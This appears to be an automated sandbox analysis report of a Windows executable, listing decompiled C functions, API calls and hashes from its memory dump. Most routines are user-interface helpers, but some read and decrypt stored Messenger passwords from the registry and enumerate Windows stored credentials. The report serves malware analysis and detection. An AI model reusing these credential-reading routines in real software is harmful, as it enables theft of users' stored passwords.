						_v0 = _t48;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x41e1fc =  *0x41e1fc + 1;
								_t62 =  *0x41e1fc + 0x11558;
							} else {
								_t62 = _v4 + 0x11171;
							}
						}
						_t50 = E00408BF9(_t62,  &_a4160);
						_pop(_t57);
						if(_t50 != 0) {
							if(_v0 != 0) {
								0x413cf4( &_a4160, _v0);
								_pop(_t57);
							}
							ModifyMenuA(_a8, _v4, 0x400, _t62,  &_a4160);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t38 = _v4;
					} while (_t38 < _a4);
					goto L15;
				}
			}












                                          0x004088d4
                                          0x004088d7
                                          0x004088df
                                          0x004088ea
                                          0x004088f4
                                          0x004088f8
                                          0x004088fc
                                          0x00408a22
                                          0x00408a28
                                          0x00408902
                                          0x00408907
                                          0x0040890e
                                          0x00408913
                                          0x0040891a
                                          0x00408929
                                          0x00408934
                                          0x0040893c
                                          0x00408940
                                          0x0040894c
                                          0x00000000
                                          0x00000000
                                          0x00408956
                                          0x004089fa
                                          0x004089fe
                                          0x00408a00
                                          0x00408a01
                                          0x00408a05
                                          0x00408a08
                                          0x00408a0d
                                          0x00408a0d
                                          0x00000000
                                          0x004089fe
                                          0x0040895c
                                          0x0040896a
                                          0x00408971
                                          0x0040897d
                                          0x00408982
                                          0x00408989
                                          0x0040898d
                                          0x00408992
                                          0x004089a0
                                          0x004089ac
                                          0x00408994
                                          0x00408998
                                          0x00408998
                                          0x00408992
                                          0x004089bb
                                          0x004089c3
                                          0x004089c4
                                          0x004089ca
                                          0x004089d8
                                          0x004089de
                                          0x004089de
                                          0x004089f4
                                          0x004089f4
                                          0x00000000
                                          0x00408a10
                                          0x00408a10
                                          0x00408a14
                                          0x00408a18
                                          0x00000000
                                          0x00408907

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                          • String ID: 0$6
                                          • API String ID: 3540791495-3849865405
                                          • Opcode ID: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
                                          • Instruction ID: a8fe6fb1212bd118e16e367106d6d34f7a286138b6ca25e595fdc587e8241262
                                          • Opcode Fuzzy Hash: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
                                          • Instruction Fuzzy Hash: 0C31BFB2408380AFC7209F55D941AABBBE8EB84314F04483FF588A2251D778D984CF5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C1E0, Relevance: 15.1, APIs: 10, Instructions: 133windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E0040C1E0(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				signed int _t44;
				signed int _t45;
				intOrPtr _t47;
				signed int _t52;
				intOrPtr _t81;
				signed char _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				void* _t90;
				void* _t91;

				_t83 = __ecx;
				_t87 = _a4;
				_t91 = _t87 - 0x402;
				_t90 = __ecx;
				if(_t91 > 0) {
					_t44 = _t87 - 0x415;
					__eflags = _t44;
					if(_t44 == 0) {
						_t45 = E00402942();
						__eflags = _t45;
						if(_t45 != 0) {
							L24:
							if(_t87 ==  *((intOrPtr*)(_t90 + 0x394))) {
								_t79 = _a12;
								_t85 =  *(_a12 + 0xc);
								_t47 =  *((intOrPtr*)(_t90 + 0x390));
								if((_t85 & 0x00000008) == 0) {
									__eflags = _t85 & 0x00000040;
									if((_t85 & 0x00000040) != 0) {
										 *0x41e1f4 =  *0x41e1f4 & 0x00000000;
										__eflags =  *0x41e1f4;
										SetFocus( *(_t47 + 0x184));
									}
								} else {
									E0040AAE2(_t47, _t79);
								}
							}
							return E00402E97(_t90, _t87, _a8, _a12);
						}
						E0040B1EC(__ecx);
						L23:
						E0040AFE6(_t83, _t90, __eflags, 0);
						goto L24;
					}
					_t52 = _t44 - 1;
					__eflags = _t52;
					if(_t52 == 0) {
						E0040B2B5(__ecx);
						goto L23;
					}
					__eflags = _t52 == 6;
					if(_t52 == 6) {
						SetFocus( *(__ecx + 0x174));
					}
					goto L24;
				}
				if(_t91 == 0) {
					 *(__ecx + 0x178) =  *(__ecx + 0x178) & 0x00000000;
					E0040B15B(__ecx);
					goto L23;
				}
				if(_t87 == 0x1c) {
					__eflags = _a8;
					if(_a8 == 0) {
						 *((intOrPtr*)(_t90 + 0x174)) = GetFocus();
					} else {
						E00402F49(__ecx, 0x41c);
					}
					goto L24;
				}
				if(_t87 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
						goto L24;
					}
					SetCursor(LoadCursorA( *0x41dbd4, 0x67));
					return 1;
				}
				if(_t87 == 0x2b) {
					_t81 = _a12;
					__eflags =  *((intOrPtr*)(_t81 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
					if( *((intOrPtr*)(_t81 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
						SetBkMode( *(_t81 + 0x18), 1);
						SetTextColor( *(_t81 + 0x18), 0xff0000);
						_v8 = SelectObject( *(_t81 + 0x18),  *(__ecx + 0x388));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t89 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExA( *(_t89 + 0x18), __ecx + 0x285, 0xffffffff, _t89 + 0x1c, 4,  &_v28);
						SelectObject( *(_t89 + 0x18), _v8);
						_t87 = _a4;
					}
				} else {
					if(_t87 == 0x7b) {
						_t86 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x390)) + 0x184))) {
							E0040C01D(__ecx, _t86);
						}
					}
				}
				goto L24;
			}



















                                          0x0040c1e0
                                          0x0040c1e9
                                          0x0040c1f1
                                          0x0040c1f3
                                          0x0040c1f5
                                          0x0040c325
                                          0x0040c325
                                          0x0040c32a
                                          0x0040c34b
                                          0x0040c350
                                          0x0040c352
                                          0x0040c362
                                          0x0040c368
                                          0x0040c36a
                                          0x0040c36d
                                          0x0040c373
                                          0x0040c379
                                          0x0040c382
                                          0x0040c385
                                          0x0040c38d
                                          0x0040c38d
                                          0x0040c394
                                          0x0040c394
                                          0x0040c37b
                                          0x0040c37b
                                          0x0040c37b
                                          0x0040c379
                                          0x00000000
                                          0x0040c3a3
                                          0x0040c356
                                          0x0040c35b
                                          0x0040c35d
                                          0x00000000
                                          0x0040c35d
                                          0x0040c32c
                                          0x0040c32c
                                          0x0040c32d
                                          0x0040c344
                                          0x00000000
                                          0x0040c344
                                          0x0040c32f
                                          0x0040c332
                                          0x0040c33a
                                          0x0040c33a
                                          0x00000000
                                          0x0040c332
                                          0x0040c1fb
                                          0x0040c315
                                          0x0040c31c
                                          0x00000000
                                          0x0040c31c
                                          0x0040c204
                                          0x0040c2f3
                                          0x0040c2f7
                                          0x0040c30d
                                          0x0040c2f9
                                          0x0040c300
                                          0x0040c300
                                          0x00000000
                                          0x0040c2f7
                                          0x0040c20d
                                          0x0040c2ca
                                          0x0040c2d0
                                          0x00000000
                                          0x00000000
                                          0x0040c2e5
                                          0x00000000
                                          0x0040c2ed
                                          0x0040c216
                                          0x0040c242
                                          0x0040c248
                                          0x0040c24e
                                          0x0040c259
                                          0x0040c267
                                          0x0040c27e
                                          0x0040c286
                                          0x0040c287
                                          0x0040c288
                                          0x0040c289
                                          0x0040c28a
                                          0x0040c2a3
                                          0x0040c2aa
                                          0x0040c2b1
                                          0x0040c2bd
                                          0x0040c2bf
                                          0x0040c2bf
                                          0x0040c218
                                          0x0040c21b
                                          0x0040c227
                                          0x0040c230
                                          0x0040c238
                                          0x0040c238
                                          0x0040c230
                                          0x0040c21b
                                          0x00000000

                                          APIs
                                          • SetBkMode.GDI32(?,00000001), ref: 0040C259
                                          • SetTextColor.GDI32(?,00FF0000), ref: 0040C267
                                          • SelectObject.GDI32(?,?), ref: 0040C27C
                                          • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C2B1
                                          • SelectObject.GDI32(00000014,?), ref: 0040C2BD
                                            • Part of subcall function 0040C01D: GetCursorPos.USER32(?), ref: 0040C02A
                                            • Part of subcall function 0040C01D: GetSubMenu.USER32(?,00000000), ref: 0040C038
                                            • Part of subcall function 0040C01D: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C066
                                          • LoadCursorA.USER32(00000067), ref: 0040C2DE
                                          • SetCursor.USER32(00000000), ref: 0040C2E5
                                          • SetFocus.USER32(?), ref: 0040C33A
                                          • SetFocus.USER32(?), ref: 0040C394
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadModePopupTrack
                                          • String ID:
                                          • API String ID: 4166086388-0
                                          • Opcode ID: 0f428dd74f7ae692e61f7adedafcb516b73031be7699d21d2f2f5f012eb25ada
                                          • Instruction ID: ca719c1047b4580995a570777fd11ce3246ad295cd7033b7258bae339062b572
                                          • Opcode Fuzzy Hash: 0f428dd74f7ae692e61f7adedafcb516b73031be7699d21d2f2f5f012eb25ada
                                          • Instruction Fuzzy Hash: B341A131110604EBCB119F64C8C9BEF7BA5FB44710F11C23AF916A62E1C739A9519B9E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004037A2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E004037A2(char* __edi, long long __fp0) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				int _v40;
				long long _v44;
				long long _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				int _t79;
				char _t80;
				signed int _t95;
				int _t99;
				int _t101;
				void* _t104;
				void* _t105;
				intOrPtr _t114;
				char _t116;
				char* _t117;
				void* _t118;
				long long _t119;
				long long* _t120;
				long long _t154;
				long long _t160;

				_t154 = __fp0;
				_t117 = __edi;
				_t79 = strlen(__edi);
				asm("fldz");
				_t104 = 0;
				_v52 = __fp0;
				_t118 = 0;
				_pop(_t105);
				_v40 = _t79;
				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v12 = 0;
				_v32 = 0;
				_v60 = 0x20;
				_v68 = 0;
				_v56 = 0;
				_v64 = 0;
				if(_t79 <= 0) {
					L43:
					_v8 = _t104;
					_t80 = 0x1a;
					if(_v16 != _t104) {
						_v8 = _t80;
					}
					if(_v20 != _t104) {
						_v8 = _v8 + _t80;
					}
					if(_v24 != _t104) {
						_v8 = _v8 + 0xa;
					}
					if(_v28 != _t104) {
						_v8 = _v8 + 0x10;
					}
					if(_v12 != _t104) {
						_v8 = _v8 + 0x11;
					}
					if(_v32 != _t104) {
						_v8 = _v8 + 0x1e;
					}
					if(_v8 <= _t104) {
						if(_v68 != _t104) {
							0x413de6(_v68);
						}
						return 0;
					} else {
						asm("fild dword [ebp-0x4]");
						 *_t120 = _t154;
						0x413d68(_t105, _t105);
						_v44 = _t154;
						 *_t120 =  *0x4196e8;
						0x413d68();
						asm("fdivr qword [ebp-0x28]");
						asm("fistp qword [ebp-0x30]");
						_t119 = _v52;
						if(_v68 != _t104) {
							0x413de6(_v68);
						}
						return _t119;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					_t116 =  *((intOrPtr*)(_t118 + _t117));
					_v8 = _t116;
					if(_t116 - 0x41 <= 0x19) {
						_v16 = _v16 + 1;
					}
					if(_t116 - 0x61 <= 0x19) {
						_v20 = _v20 + 1;
					}
					if(_t116 - 0x30 <= 9) {
						_v24 = _v24 + 1;
					}
					if(_t116 - 0x20 <= 0xf) {
						_v28 = _v28 + 1;
					}
					if(_t116 - 0x3a <= 6) {
						_v12 = _v12 + 1;
					}
					if(_t116 - 0x5b <= 5) {
						_v12 = _v12 + 1;
					}
					if(_t116 < 0x7b) {
						L16:
						if(_t116 <= 0x7e) {
							goto L18;
						}
						goto L17;
					} else {
						if(_t116 > 0x7e) {
							L17:
							_v32 = _v32 + 1;
							L18:
							if(_t118 != _t104) {
								_t95 = 0;
								if(_v56 <= 0) {
									L27:
									_t95 = _t95 | 0xffffffff;
									L28:
									_t104 = 0;
									if(_t95 < 0) {
										E004040C3( &_v68, _v8);
										_t99 = abs( *((char*)(_t118 + _t117)) -  *((char*)(_t118 + _t117 - 1)));
										_pop(_t105);
										if(_t99 != 1) {
											_t47 = _t99 - 2; // -2
											_t105 = _t47;
											if(_t105 > 3) {
												if(_t99 < 6) {
													if(_t99 <= 0xa) {
														goto L42;
													}
													L40:
													_t154 = _v52 +  *0x4196f0;
													L41:
													_v52 = _t154;
													goto L42;
												}
												if(_t99 > 0xa) {
													goto L40;
												}
												_t154 = _v52 +  *0x4196f8;
												goto L41;
											}
											_t154 = _v52 +  *0x419700;
											goto L41;
										}
										_t160 = _v52;
										L30:
										_t154 = _t160 +  *0x419710;
										goto L41;
									}
									_t101 = abs(_t116 -  *((char*)(_t118 + _t117 - 1)));
									_t160 = _v52;
									_pop(_t105);
									if(_t101 != 0) {
										_t154 = _t160 +  *0x419708;
										goto L41;
									}
									goto L30;
								}
								L21:
								L21:
								if(_t95 < 0 || _t95 >= _v56) {
									_t114 = 0;
								} else {
									_t114 =  *((intOrPtr*)(_t95 + _v68));
								}
								if(_t114 == _t116) {
									goto L28;
								}
								_t95 = _t95 + 1;
								if(_t95 < _v56) {
									goto L21;
								}
								goto L27;
							}
							E004040C3( &_v68, _v8);
							goto L40;
						}
						_v12 = _v12 + 1;
						goto L16;
					}
					L42:
					_t118 = _t118 + 1;
				} while (_t118 < _v40);
				goto L43;
			}
































                                          0x004037a2
                                          0x004037a2
                                          0x004037ab
                                          0x004037b0
                                          0x004037b2
                                          0x004037b4
                                          0x004037b7
                                          0x004037bb
                                          0x004037bc
                                          0x004037bf
                                          0x004037c2
                                          0x004037c5
                                          0x004037c8
                                          0x004037cb
                                          0x004037ce
                                          0x004037d1
                                          0x004037d8
                                          0x004037db
                                          0x004037de
                                          0x004037e1
                                          0x00403917
                                          0x0040391c
                                          0x0040391f
                                          0x00403920
                                          0x00403922
                                          0x00403922
                                          0x00403928
                                          0x0040392a
                                          0x0040392a
                                          0x00403930
                                          0x00403932
                                          0x00403932
                                          0x00403939
                                          0x0040393b
                                          0x0040393b
                                          0x00403942
                                          0x00403944
                                          0x00403944
                                          0x0040394b
                                          0x0040394d
                                          0x0040394d
                                          0x00403954
                                          0x00403997
                                          0x0040399c
                                          0x004039a1
                                          0x00000000
                                          0x00403956
                                          0x00403956
                                          0x0040395b
                                          0x0040395e
                                          0x00403963
                                          0x0040396c
                                          0x0040396f
                                          0x00403977
                                          0x0040397f
                                          0x00403982
                                          0x00403985
                                          0x0040398a
                                          0x0040398f
                                          0x00000000
                                          0x00403990
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004037e7
                                          0x004037e7
                                          0x004037e7
                                          0x004037f0
                                          0x004037f3
                                          0x004037f5
                                          0x004037f5
                                          0x004037fe
                                          0x00403800
                                          0x00403800
                                          0x00403809
                                          0x0040380b
                                          0x0040380b
                                          0x00403814
                                          0x00403816
                                          0x00403816
                                          0x0040381f
                                          0x00403821
                                          0x00403821
                                          0x0040382a
                                          0x0040382c
                                          0x0040382c
                                          0x00403832
                                          0x0040383c
                                          0x0040383f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403834
                                          0x00403837
                                          0x00403841
                                          0x00403841
                                          0x00403844
                                          0x00403846
                                          0x00403858
                                          0x0040385d
                                          0x0040387c
                                          0x0040387c
                                          0x0040387f
                                          0x0040387f
                                          0x00403883
                                          0x004038b3
                                          0x004038c4
                                          0x004038cc
                                          0x004038cd
                                          0x004038d4
                                          0x004038d4
                                          0x004038da
                                          0x004038ea
                                          0x004038ff
                                          0x00000000
                                          0x00000000
                                          0x00403901
                                          0x00403904
                                          0x0040390a
                                          0x0040390a
                                          0x00000000
                                          0x0040390a
                                          0x004038ef
                                          0x00000000
                                          0x00000000
                                          0x004038f4
                                          0x00000000
                                          0x004038f4
                                          0x004038df
                                          0x00000000
                                          0x004038df
                                          0x004038cf
                                          0x0040389d
                                          0x0040389d
                                          0x00000000
                                          0x0040389d
                                          0x00403890
                                          0x00403897
                                          0x0040389a
                                          0x0040389b
                                          0x004038a5
                                          0x00000000
                                          0x004038a5
                                          0x00000000
                                          0x0040389b
                                          0x00000000
                                          0x0040385f
                                          0x00403861
                                          0x00403870
                                          0x00403868
                                          0x0040386b
                                          0x0040386b
                                          0x00403874
                                          0x00000000
                                          0x00000000
                                          0x00403876
                                          0x0040387a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040387a
                                          0x0040384e
                                          0x00000000
                                          0x0040384e
                                          0x00403839
                                          0x00000000
                                          0x00403839
                                          0x0040390d
                                          0x0040390d
                                          0x0040390e
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@$strlen
                                          • String ID:
                                          • API String ID: 4288758904-3916222277
                                          • Opcode ID: 9742cbc5a7c83877be7f1addebf5a9349f3f5e6e9056573cb17e04df5597c3af
                                          • Instruction ID: d333ae2b58ca57a5e95d27ff611bbcc91c556c8a5badbdc87924e9ab9e00570b
                                          • Opcode Fuzzy Hash: 9742cbc5a7c83877be7f1addebf5a9349f3f5e6e9056573cb17e04df5597c3af
                                          • Instruction Fuzzy Hash: 15616AB1C0461ADADF20AFA5D4854EEBFB8FB05306F2084BFE151B2281C7794B428B49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040FE5D, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 99registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,73AFF420,00000000), ref: 0040FE8C
                                          • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040FF56
                                            • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                            • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                          • memcpy.MSVCRT ref: 0040FEFE
                                          • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040FF0A
                                          • RegCloseKey.ADVAPI32(?), ref: 0040FF79
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpy
                                          • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                          • API String ID: 2372935584-105384665
                                          • Opcode ID: 0efffbcd1b8067ca95f35c9c097a34e3d5fc4d975f38032de2900e02614f1ca4
                                          • Instruction ID: 9eae1372b2d93665619faee8fa876547b7665fb4356df5418aeb828a8df32af1
                                          • Opcode Fuzzy Hash: 0efffbcd1b8067ca95f35c9c097a34e3d5fc4d975f38032de2900e02614f1ca4
                                          • Instruction Fuzzy Hash: AD314FB2D00219AFDB11DF95D880ADEBBB8FF49344F004077F515B3251D7389A499B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404D7A, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00404D7A(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t7;
				_Unknown_base(*)()* _t12;
				struct HWND__* _t16;
				void* _t21;
				struct HINSTANCE__* _t24;

				_v12 = 8;
				_v8 = 0xff;
				_t16 = 0;
				_t21 = 0;
				_t24 = LoadLibraryA("comctl32.dll");
				if(_t24 == 0) {
					L5:
					 *0x415038();
					_t7 = 1;
					L6:
					if(_t7 != 0) {
						return 1;
					} else {
						MessageBoxA(_t7, "Error: Cannot load the common control classes.", "Error", 0x30);
						return 0;
					}
				}
				_t12 = GetProcAddress(_t24, "InitCommonControlsEx");
				if(_t12 != 0) {
					_t21 = 1;
					_t16 =  *_t12( &_v12);
				}
				FreeLibrary(_t24);
				if(_t21 == 0) {
					goto L5;
				} else {
					_t7 = _t16;
					goto L6;
				}
			}










                                          0x00404d87
                                          0x00404d8e
                                          0x00404d95
                                          0x00404d97
                                          0x00404d9f
                                          0x00404da3
                                          0x00404dcd
                                          0x00404dcd
                                          0x00404dd5
                                          0x00404dd6
                                          0x00404ddb
                                          0x00404df8
                                          0x00404ddd
                                          0x00404dea
                                          0x00404df3
                                          0x00404df3
                                          0x00404ddb
                                          0x00404dab
                                          0x00404db3
                                          0x00404db9
                                          0x00404dbc
                                          0x00404dbc
                                          0x00404dbf
                                          0x00404dc7
                                          0x00000000
                                          0x00404dc9
                                          0x00404dc9
                                          0x00000000
                                          0x00404dc9

                                          APIs
                                          • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
                                          • FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$AddressFreeLoadMessageProc
                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                          • API String ID: 2780580303-317687271
                                          • Opcode ID: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
                                          • Instruction ID: eec6f3f66ef6417fb43289990c32370c6d67362bb519490399a3c202bd773795
                                          • Opcode Fuzzy Hash: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
                                          • Instruction Fuzzy Hash: 6701D671751615ABD3215BA09C49BEB3EA8DFC9749B118139E206F2180DFB8CA09829C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406735, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 27%
                                          			E00406735(long __edi, intOrPtr _a4) {
				char _v8;
				void* _t8;
				void* _t9;
				long _t12;
				long _t22;

				_t22 = __edi;
				_t8 = 0;
				_t12 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
					if(0 != 0) {
						_t12 = 0x1900;
					}
				}
				_t9 = FormatMessageA(_t12, _t8, _t22, 0x400,  &_v8, 0, 0);
				if(_t9 <= 0) {
					0x413d0c(_a4, "Unknown Error");
				} else {
					if(strlen(_v8) < 0x400) {
						0x413d0c(_a4, _v8);
					}
					_t9 = LocalFree(_v8);
				}
				return _t9;
			}








                                          0x00406735
                                          0x00406743
                                          0x0040674b
                                          0x00406750
                                          0x0040675a
                                          0x00406762
                                          0x00406764
                                          0x00406764
                                          0x00406762
                                          0x00406778
                                          0x00406780
                                          0x004067af
                                          0x00406782
                                          0x0040678d
                                          0x00406795
                                          0x0040679b
                                          0x0040679f
                                          0x0040679f
                                          0x004067b9

                                          APIs
                                          • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 0040675A
                                          • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406778
                                          • strlen.MSVCRT ref: 00406785
                                          • _mbscpy.MSVCRT ref: 00406795
                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 0040679F
                                          • _mbscpy.MSVCRT ref: 004067AF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                          • String ID: Unknown Error$netmsg.dll
                                          • API String ID: 2881943006-572158859
                                          • Opcode ID: 6c5198025c4bc101f62493cbe4ad8011c35f98b5ff5852a1443cd9ba15c7a2da
                                          • Instruction ID: dfc2e55caf94d9be92a05a02ea8e3c4f3bcfe7ce6760d4d77d664b9d120d38b6
                                          • Opcode Fuzzy Hash: 6c5198025c4bc101f62493cbe4ad8011c35f98b5ff5852a1443cd9ba15c7a2da
                                          • Instruction Fuzzy Hash: F1014731600210BBDB152B60FD46EDF7F2CDF44B95F20403AF602B6090DA385E50C69C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404109, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 35libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404109(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;
				struct HINSTANCE__** _t19;

				_t19 = __eax;
				E00404170(__eax);
				_t10 = LoadLibraryA("advapi32.dll");
				 *_t19 = _t10;
				if(_t10 != 0) {
					_t19[2] = GetProcAddress(_t10, "CredReadW");
					_t19[3] = GetProcAddress( *_t19, "CredFree");
					_t14 = GetProcAddress( *_t19, "CredEnumerateW");
					_t19[4] = _t14;
					if(_t19[2] == 0 || _t19[3] == 0 || _t14 == 0) {
						E00404170(_t19);
					} else {
						_t19[1] = 1;
					}
				}
				return _t19[1];
			}







                                          0x0040410a
                                          0x0040410c
                                          0x00404116
                                          0x0040411e
                                          0x00404120
                                          0x00404138
                                          0x00404144
                                          0x00404147
                                          0x0040414d
                                          0x00404151
                                          0x00404166
                                          0x0040415d
                                          0x0040415d
                                          0x0040415d
                                          0x00404151
                                          0x0040416f

                                          APIs
                                            • Part of subcall function 00404170: FreeLibrary.KERNEL32(?,00404111,00000000,0040FFAB,73AFF420), ref: 00404177
                                          • LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,73AFF420,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
                                          • GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$Library$FreeLoad
                                          • String ID: CredEnumerateW$CredFree$CredReadW$advapi32.dll
                                          • API String ID: 2449869053-331516685
                                          • Opcode ID: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
                                          • Instruction ID: 12efa8cab8f3f54fa256443a021a4d85af4a352dd089a4683602f903f3396d9b
                                          • Opcode Fuzzy Hash: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
                                          • Instruction Fuzzy Hash: E7F0FFB06087009AD770AF75DC09B97BAF4AFD8700B25883FE195A6690D77DE8C1CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040955A, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 43%
                                          			E0040955A(void* __eax, void* __eflags, signed int _a4, short _a8) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t96;
				signed int _t98;
				void* _t99;
				signed int _t104;
				signed short _t107;
				signed int _t110;
				intOrPtr _t114;
				signed int _t117;
				signed int _t119;
				signed short _t121;
				signed int _t122;
				signed int _t152;
				signed int _t156;
				signed int _t158;
				signed int _t161;
				signed int _t163;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t178;
				intOrPtr _t180;

				_t174 = __eflags;
				_t172 = __eax;
				E00409370(__eax);
				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
				_t122 = 5;
				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
				_t156 = 0x14;
				_t96 = _t122 * _t156;
				 *(_t172 + 0x1b0) = _t122;
				0x413d5c( ~(0 | _t174 > 0x00000000) | _t96);
				 *(_t172 + 0x1b4) = _t96;
				_t158 = 0x10;
				_t98 = _t122 * _t158;
				0x413d5c( ~(0 | _t174 > 0x00000000) | _t98);
				 *(_t172 + 0x34) = _t98;
				_v8 = 0x41b8d8;
				do {
					_t99 = _v8;
					_t168 =  *_t99;
					_v12 = _t168;
					_t169 = _t168 * 0x14;
					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
					_t104 = _v12 << 4;
					_v12 = _t104;
					memcpy( *(_t172 + 0x34) + _t104, _v8 + 0x14, 0x10);
					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
					_t173 = _t173 + 0x18;
					_v16 = _t107;
					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
					if((_t107 & 0xffff0000) == 0) {
						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E0040876F(_t107 & 0x0000ffff);
